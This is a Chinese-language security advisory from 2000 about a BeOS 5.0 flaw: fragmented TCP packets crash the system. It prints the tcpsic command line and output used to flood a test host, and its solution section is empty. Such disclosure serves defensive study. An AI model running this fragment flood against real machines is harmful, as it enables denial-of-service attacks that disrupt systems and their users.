漏洞发布时间:2000-5-19 15:28:00
漏 洞 描 述:
BeOS存在一个漏洞,远程攻击者通过TCP碎片包进行攻击,可用倒在系统崩溃,必须重新启动才能恢复功能。
下面是漏洞测试的实例,采用了BSD下的一个tcpsic工具包产生碎片攻击:
[root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46
-r 31337 -F100 -V0
-I0 -T0 -u0 -t0
Compiled against Libnet 1.0.1b
Installing Signal Handlers.
Seeding with 31337
No Maximum traffic limiter
Using random source ports.
Using random destination ports.
Bad IP Version = 0% IP Opts Pcnt = 0%
Fragd Pcnt = 100% Urg Pcnt = 0%
Bad TCP Cksm = 0% TCP Opts Pcnt = 0%
1000 @ 1802.8 pkts/sec and 1174.6 k/s
2000 @ 1636.8 pkts/sec and 1105.5 k/s
3000 @ 2110.2 pkts/sec and 1396.4 k/s
4000 @ 1689.1 pkts/sec and 1105.4 k/s
Caught signal 2
Used random seed 31337
Wrote 5002 packets in 2.74s @ 1824.48 pkts/s
这样BeOS 5.0系统将会产生拒绝服务。
解 决 方 法:
